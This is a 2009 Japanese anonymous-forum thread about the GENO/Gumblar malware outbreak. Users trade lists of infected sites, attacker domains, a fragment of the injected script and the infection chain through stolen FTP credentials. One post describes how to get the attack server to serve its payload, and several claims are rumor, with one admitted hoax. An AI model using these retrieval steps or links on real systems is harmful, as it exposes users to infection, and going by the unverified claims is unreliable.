310 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:20 ]
東方ジャンルが死んだのはめでたい



311 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:37 ]
javaオフでも感染する場合があるんだっけ?
もうフラフラできんな
2chブラウザで2chしか見れなくなりそう

312 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:42 ]
>>306
やるだけやってみて駄目なら諦めたら?

313 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:46 ]
>>307
FTPで接続したときパスとかバレて第三者に云々

314 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:03 ]
パケモン感染しねえかな

315 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:41 ]
野球やろーぜ

316 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:21:46 ]
エロマンガサイトで感染したのって出た?

317 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:13 ]
>>302
釣り乙

318 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:19 ]
野球ch感染してるんじゃね?

319 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:21 ]
>>316
またエロマンガ見てる・・・

320 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:22:39 ]
そりゃウイルス作者だって書き込めるんだしチェックは絶対してるんだろうから
荒らしもするんじゃない?



321 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:23:21 ]
>>164
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

これもGENOウィルスかな。

322 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:23:54 ]
>>286
同人関係はネット上で規模のあるコミュニティを形成してるから
情報が伝わりやすいってのがあるんじゃないか?絶対数の差もあるんだろうけど。

いかにも一般人な人がやってるサイトだとそういう情報って伝播しにくいだろうな。
ここですらよく判ってない奴多すぎだし、IT情報に疎い種類の連中は大変だ。

323 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:28 ]
壺に入ってたら大騒ぎだろうな


324 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:31 ]
>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ

p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/

325 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:24:50 ]
同人・ヲタ系以外で感染してる有名サイトってどこなんだ?

326 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:25:25 ]
>>313
そうゆうことかありがとう、じゃあ自分のブログはFTP接続じゃないから大丈夫だな。

327 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:26:17 ]
うぜええ

328 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:26:41 ]
>>324
www■senlights■co■jp/seihin/kirenaru-1s■htm

俺はここから感染してるっぽい

329 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:27:19 ]
>>298
2chと関わりのあるBIG-server.comが感染してた事例もあるからなあ
ニコ動も無縁ではないかも

【BIG-server.com】maido3.comがウイルスにより改竄、ウイルススキャンのお願いとお詫び[05/11]
gimpo.2ch.net/test/read.cgi/owabiplus/1242055283/

330 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:04 ]
ふたば感染してるって全板感染してるの?



331 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:25 ]
ウィルス、命名されたか。(多分)海外での感染源は、トラフィックの多いアダルトサイトか。
しかし、検出可否スレでも新種が見つかっているようだな・・・。

332 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:28:37 ]
ふたばはガセじゃなかったか

333 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:13 ]
74 ヤマボウシ(dion軍) [sage] 2009/05/16(土) 22:01:12.03 ID:qgx0kH7v
【特徴】
・亜種大杉 セキュリティソフトが対応しきれていない
 症状もまちまちでいまいち決定打が無い
・ftpを介して感染者のサイトをゾンビ化
・トラフィックが監視されてるから、ID・Passやクレカ番号が筒抜け
 Botnet汚染や、キャプチャ画像の送信の疑いと言う情報もあり
・クリーンインストールが唯一の対処法
・キンタマなどとは違い感染源が明確なので、
 感染源の企業などから圧力がかかってしまう。よってマスコミの報道も消極的

334 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:22 ]
ソースチェッカーでなにも出ない場合は少しは安心してもいいんですかね

335 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:29:58 ]
>>334
ユーザーエージェントみてるからSCOでも変えないとでない

336 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:30:26 ]
ニュースサイトどっか取り上げてないのん

337 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:30:38 ]
>>311
何度も出てるけどJavaScriptな

338 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:30:42 ]
さっきエクスプローラーが異常終了してびびった。
cmdもregeditも起動するしsqlsodbc.chmも問題なかった。
怖いからwin7beta使うことにする。

339 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:31:22 ]
avastでスキャンする場合圧縮ファイルもやったほうがいいの?

340 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:31:28 ]
>>334
ソースの内容まで見ろよ
安全度100%でも感染してる



341 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:32:13 ]
2chが感染したら日本終わるな

342 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:33:29 ]
信じられるのは自分だけだってばっちゃが言ってた

343 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:34:02 ]
>>294
714 名前:709[sage] 投稿日:2009/04/10(金) 00:33:30
>>713
>>709は私だ(* >ω<)=3プー

GENOウイルススレ 「1」だw

344 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:34:37 ]
>>328
martuz.cnに飛ばされるね。
比較的最近感染したサイトのかもしれない。

345 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:36:20 ]
>>344
へえそうなんだ 怖くて開けられないけど
親父がIE7でそこ閲覧した時に感染したっぽい

346 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:36:40 ]
クリーンインスコしてもFTPのパス変えないと意味ないってさ
また改竄されるらしい

347 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:00 ]
>>326
FTPだけじゃないです

348 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:31 ]
知ってるから

349 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:45 ]
ホラー映画作れそう

350 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:57 ]
DLsite.comだけは
感染しませんように( -人-)



351 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:37:57 ]
>>324
Firefoxでアクセスしてみたけど全部
martuz■cn/vid/?id=
からファイルを取ろうとするね。それでそこに直接行っても
// No news...
と表示されるだけ。。IEじゃないとだめか・・

352 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:38:35 ]
なんか話通じない人いるよね

353 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:39:02 ]
>>347
FTPて何だか教えて下さい


354 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:39:41 ]
巨大ボットネット発見,190万台の感染マシンで構成
itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/

355 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:15 ]
よく分からんけど
.cnを全部弾いたらおk?

356 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:31 ]
スレの最初に書いてる以外の方法で感染確認する方法はない?

357 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:37 ]
>>353
知らないなら気にしなくて良い

358 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:40 ]
>>318 なん実Jにも広がってるなw
ttp://baseball.fan-site.net/uhyo/tan/img/2694.jpg

359 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:40 ]
ひどい広がり様

360 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:40:59 ]
>>328
unescapeしてみたよ
martuz.cn だってさ
ホームページトップからして改ざんされとった

こりゃパターンマッチむずいな...
src=//mar"+"tux.cn/vid
とかなってた。連結の位置ずらしただけでマッチしないよねぇ



361 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:41:16 ]
662 名前:GENO 報告 [sage] 投稿日:2009/05/16(土) 22:37:44 ID:5Y6mJ8vc0
 商業乙女ゲー(PC)のリボンマジック公式サイト
 アクセスしようとするとGoogleにブロックされて下記のメッセージ

 >不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。

362 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:42:04 ]
他人に感染させる経路はFTPだけ?
フラッシュメモリからなら感染したPCからデータ受け取っても大丈夫?

363 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:42:16 ]
>>354
さらに強まったのが出てきそうだな

364 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:43:06 ]
>>361
また公式サイトが

365 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:43:52 ]
>>344
4/29の正午ぐらいに閲覧した時に感染したかもしれん
GENOの初出はいつだっけ

366 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:44:55 ]
感染してないけど何か不安だな
サイト一旦閉じて沈静化待つべきか

367 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:06 ]
しかし何でこんな急速に広まったんだ
もう下火ってイメージだったのに

368 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:45 ]
GENOはhostsで禁止してるからもう2度と見たい

369 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:46 ]
腐女子が騒いだ

370 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:48 ]
なんか具体的な情報が今一つ分からんな。
Javascriptは只のダウンローダで、Adobe Reader、Flash Playerの脆弱性を突いて勝手にダウンロードするとかいう仕組み?
最近のサイト改ざんはMS鯖の脆弱性を突いてるのが多いが、同人サイトみたいなのがやられてるってのは、今回のは違うっぽいのか。



371 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:45:58 ]
ニコ動とpixivと2chにかまけて自サイトずっと放置してて良かった

372 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:25 ]
>>368
どっちだよw

373 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:41 ]
>>367
GENOの対応
小遣いサイトや小林製薬など中年層が感染して気付かず放置

374 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:53 ]
>>367
同人版の奴らが調べだしたから

375 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:53 ]
>>370
そうだけど、ftpからの改竄は別物だよ

376 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:46:59 ]
>>365
GENOで感染、で騒がれ始めたのは確か4月5日あたり

実際には3月28日頃からポツポツとあったらしい

377 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:47:45 ]
初期に感染してた奴らは何見て感染したんだか

378 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:24 ]
GENO

379 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:46 ]
>>365
326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?

これが最初

380 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:48:50 ]
GENO先生



381 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:08 ]
>>379
それ違う
深夜3時くらいのがあったはず

382 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:12 ]
>>370
傍受したFTP接続情報を元に普通に接続して改ざんするからね。
サーバーのOSは関係無いよ。
逆に言えば感染後にFTPで通信していなければ、FTP接続情報は漏れない。

383 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:49:15 ]
GENOがもっとウィルスについて説明していれば良かったのに

384 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:22 ]
>>368
はっきりしなさい!

385 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:37 ]
>>376
あーほんとだ
最近なんだ ありがとう

386 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:50:44 ]
GENOのキャッシュ消せばダイジョブって説明を鵜呑みにしてました!><;

387 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:28 ]
いいから黙ってキャッシュ消せよ

388 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:33 ]
avast使ってれば問題ないってことか?

389 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:50 ]
GENO体質

390 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:51:59 ]
林明美のHP踏むとavast反応するらしいけどアドレスが分からぬ



391 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:52:09 ]
俺は今日はじめて知ったけど、けっこう前から出回ってたんだね。
じゃあ、なぜ俺様の購入した優秀なノートン様が未対応なんだ?
それとも闘ってくれてるのか?

392 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:23 ]
もう感染報告から一カ月以上たつのに
いまだに対策されてないサイトがこんなにあるんだな

393 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:26 ]
>>375 >>382 ありがトン
感染後にFTPのパスを盗むんだな。その後鯖に勝手にアクセスしてソース改ざんかw 凝ってるなあ。
仮にこのパターンばっかりだったらFTPへのアクセスログでも見とけば良いのか。
最近のウィルスはチェックソフトで見つからない奴が多くて怖いよ・・・。


394 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:31 ]
Avastのサイトでウイルスクリーナーダウンロードしてみたんだけど
いざ検索を開始すると「ファイルが検索できません!」て表示が出る
なぜ??

395 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:52:48 ]
>>391
ノートンは今俺の膝枕で寝ている

396 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:53:02 ]
GENOギアス

397 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:53:38 ]
cmd.exeでsqlsodbc.chmの容量確認したら0になってた
おかしいと思いつづ直接探しにいったら見つけられない、ファイル消えてる臭い
1時間前までは普通に確認できたんだけど何なんだろうなこれ。カスペルは問題なく当てられる
カスペルで変なもん引っかかったら報告しに来るよ

398 名前:362 mailto:sage [2009/05/16(土) 22:54:38 ]
FTP以外で感染するかわかる人、いませんかー?

399 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:54:44 ]
ところで、今のところ感染経路はAdobeのPDFかFlashの脆弱性をついたバイナリ実行によるものと認識しているんだが、
今感染してる連中ってのは、4月初めのGENO騒動のときに、FlashもReaderもUpdateしてなかった連中ってことか?

それとも何か別の感染経路があるのか?

400 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:54:58 ]
GENOが潰れるなりしてくれたら
気分的にはすっきりするんだけどなあ



401 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:08 ]
同人板のスレってアニメキャラ板とかのスレにも貼られてるんだな。
道理で馬鹿の他に初心者以下のカスがいるはずだ

402 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:11 ]
>>324を検知するアンチウイルスソフトまとめて

403 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:47 ]
>>351
ほんとだ…
以前チェックした時はgumblar.cnを読み込んでるサイトがほとんどだったんだが
恐らくリモートから攻撃コードを更新されたんだと思う

ちなみに直接ロケーションバーにmartuz■cn〜を打ち込んでも
攻撃コードはダウンロードされないよ。
攻撃サーバはUA、IPアドレス、cookie、リファラを駆使して解析から逃れようと試みる。
攻撃コードをダウンロードするには

・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・cookieを拒否する
・XP以下のWindowsでアクセスする。またはUAを偽装する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える

以上の条件を満たすことが必要

404 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:55:52 ]
FC2でサイト作ってる人はどうなんだろうかね(´・ω・`)

405 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:25 ]
>>397
気になる
検索終わったら頼むな

406 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:32 ]
ジーノってなんなの?
昔やったマリオRPGのイメージしか思い出せん

407 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:42 ]
>>390
replica08.web.fc2.com/index.html
多分これじゃないか

408 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:44 ]
>>391
ノートン先生は俺のをなめてるよ

409 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:56:46 ]
>>399
前者。だが前とはコードも飛ばし先も変わってる。

410 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:01 ]
いつも仮想PC上からサイト更新してるんだけど、もしホストPCが感染していたら
仮想PCからのFTPも危険?



411 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:06 ]
9.11でもダメって聞いたけどデマなの?

412 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:37 ]
XPgenocideウイルスだなこりゃ

413 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:57:43 ]
>>410
アウト

414 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:06 ]
リーダーは削除した方がいい

415 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:06 ]
>>410
多くの場合セーフ

416 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:32 ]
>>413
ありがと、しばらく更新見送る

417 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:48 ]
>>410
ホストならアウト

418 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:58:56 ]
>>410
え?じゃあ単純にアップデートしてないからこうなったの?
もっとも亜種が広がればどうなるかは知らないが、拡散したやつはそこを突いてるやつだったわけか?

419 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:18 ]
>>414
脆弱性のアップ来てるから削除する必要なし



420 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:33 ]
>>410
セーフ



421 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:59:40 ]
アドビリーダーって消して大丈夫なのか

422 名前:418 mailto:sage [2009/05/16(土) 22:59:49 ]
×>>410 ○>>409 ごめん安価間違えた

423 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:12 ]
>>388
いいえ

424 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:16 ]
>>410
セフト

425 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:17 ]
FlashもReaderもアップデートしてない人が多いんじゃない
してなくても余程古くない限りそれといった支障ないし

426 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:39 ]
>>421
PDF読むのならもっと良いソフトもあるから

427 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:40 ]
いらないっちゃいらない
いるっちゃいる

428 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:00:41 ]
>>409
d、つまりサイト閲覧者の立場から見た場合、4月騒動の時点で感染経路を塞ごうと思えばいくらでも塞げたって事だな

429 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:14 ]
あ、セーフっぽいのか
どちらにしろしばらく控えるけど

430 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:20 ]
>>425
6.0からアップデートしてなかった。
慌ててやったよ。



431 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:19 ]
リーダーが対応したのは何日か前の更新じゃないの?

432 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:01:24 ]
>>398
いまのところそういうのはない
別のウイルスに感染してなきゃ大丈夫じゃね
ただし今のところなだけで今後どうなるかは不明

433 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:02:21 ]
>>431
それとは別

434 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:02:26 ]
もし感染したらってはなしなんだけど
自分が作成したHPみたらavastは警告出す?

435 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:16 ]
>>428
adobeがセキュリティー対応したのは昨日か一昨日ぐらいじゃなかったか?

436 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:37 ]
GENOウイルスに感染したclientがftp使われてjsうpするわけじゃないから

437 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:39 ]
>>434
やつは進化するから確信はないだろ

438 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:03:41 ]
>>426
pdfってAdobe以外でも読めたの!?

439 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:09 ]
>>437
今のところはわかるってことですか?

440 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:13 ]
>>435
それとは別です



441 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:27 ]
>>438
情報弱者ってかわいそうだな

442 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:42 ]
>>435
いや、もっと前に脆弱性の更新はあったよ
最近のはまた別

443 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:04:53 ]
>>407
うちのAviraたんは反応してくれないがちゃんと攻撃コードは埋め込まれてるね
ttp://www.dotup.org/uploda/www.dotup.org34438.png

444 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:03 ]
質問きたら
「亜種が出てくるかもしれないからそれはわからん」って感じのレスしかできないよね

445 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:19 ]
(1)感染してるサイトを閲覧する
(2)自分のパソコンが感染する
(3)その状態でFTPで自分のサイトを更新する
(4)その時にFTPのIDとパスを抜かれる
(5)ウイルスが勝手にHTML、phpファイル等に不正なジャバスクリプトを埋め込む
(6)サイトが感染状態になる。
(7)そのサイトを見た人が感染する

1) どっかの感染している index.html やら index.php やらを持ったサイトを、
自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする
2) 担当の人の PC にトロイが侵入する

3) 2) で侵入したトロイは、担当の人が FTP で
自分のサイトにアクセスするのを待ち続ける
4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、
トロイがその様子をチェックしていて、そのサイトにアクセスした
ログイン名とパスワードを盗み取る

5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って
そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、
そのサイトに感染コードを仕込む
5') もしうまく作ってあるトロイなら、ローカルの PC にある
自分のサイトに上げるためのファイルのローカルコピーにも、
同じ感染コードを仕込むだろう。

6) 1) に戻る

446 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:05:39 ]
.cnドメイン全部塞いでればまだマシなのかもしれんな

447 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:20 ]
スレざっと見た感じだと
Adobe製品さえ一切使わなければ感染は絶対にしないのか?

448 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:22 ]
>>443
俺もavira
反応しないねぇ
javascriptOffだとだめみたい

Onにして配布元のpdfやらフラッシュをgetするところまでいくと
反応するんだろうか

ってかcnとkrを全ブロックてすごいなあんたw

449 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:23 ]
www.i-like-movie.com/
感染してる

450 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:32 ]
>>443
敵もavastやchromeなどで対策を講じているようだ
もうノートンやバスタークラスでは検知できないな



451 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:07:35 ]
自分のサイトが感染してるかどうかはソース見たらわかるんだよね?

452 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:08 ]
>>17
Aを試して50,727バイトだった安心していいよな?

でも亜種多すぎてもう訳ワカンネ
cmd.exe開けても感染してるくらいだから、Aも既に破られてんじゃね

453 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:17 ]
>>449
してるなら踏ませないようにしろよ

454 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:23 ]
>>444
現時点で既存亜種含めたウイルスの挙動を完全に解析した奴はいないっぽいからな。
突然HDD全消去するとかなにかの隠し機能がまだあるかもしれない。

455 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:08:41 ]
>>447
使ってなくても古いのがインストールされてれば危ない
FlashPlayerなしっていうのはあんまりない状況だと思う

456 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:10 ]
>>449
マジか?!
ここ閲覧者莫大じゃないの?

457 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:32 ]
まぁ今の現状を見て書き込みすりゃいいよ
未来のことなんてわからんし

458 名前:449 mailto:sage [2009/05/16(土) 23:09:43 ]
ごめん、嘘ぴょん

459 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:49 ]
なんで感染してるのを貼るんだ

460 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:09:58 ]
キーロガー使って個人情報を収集して送信するようなウィルスでもHDDを全部飛ばしたりするのか?



461 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:10:02 ]
>>458
市ね

462 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:10:17 ]
>>452
更新日時が今年の3月以降ならアウトという話も聞いた

463 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:31 ]
*.*\(cn|kr)/.*$/

採用

464 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:47 ]
こんな状況で嘘はやめろよな、情報信じれなくなるじゃんか

465 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:11:50 ]
>>460
ウイルス作ってる奴の気まぐれでそういうやり方に切り替えたりするかもね。
続々と亜種が出てるなら複数人でやってる可能性もあるし、
その中に紛れてる協調性の無い馬鹿がやらかしたりするかも・

466 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:00 ]
Adobe Flashなんたらを消せばいいの?

467 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:16 ]
>>449
C:\にアクセスするimg要素が有るけど感染してないのかなんだ。

468 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:12:47 ]
>>462
五年前だ
よかった

469 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:00 ]
大問題だと思うんだがまったく報道されてないのはなぜよ

470 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:00 ]
>>451
多分
今の状態で言うと



471 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:03 ]
>>466
いい加減巣に帰れよ

472 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:13:09 ]
>>466
アップデートすれば良いだけだ


473 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:13:37 ]
フレッツウイルスクリアさんは何もしてくれないのか

474 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:12 ]
巣に帰れとかいい加減お前がうぜーよ

475 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:22 ]
UAをVISTAのバージョンにしたら回避できる?

476 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:14:22 ]
これって、ウィジェット経由でも感染するの?

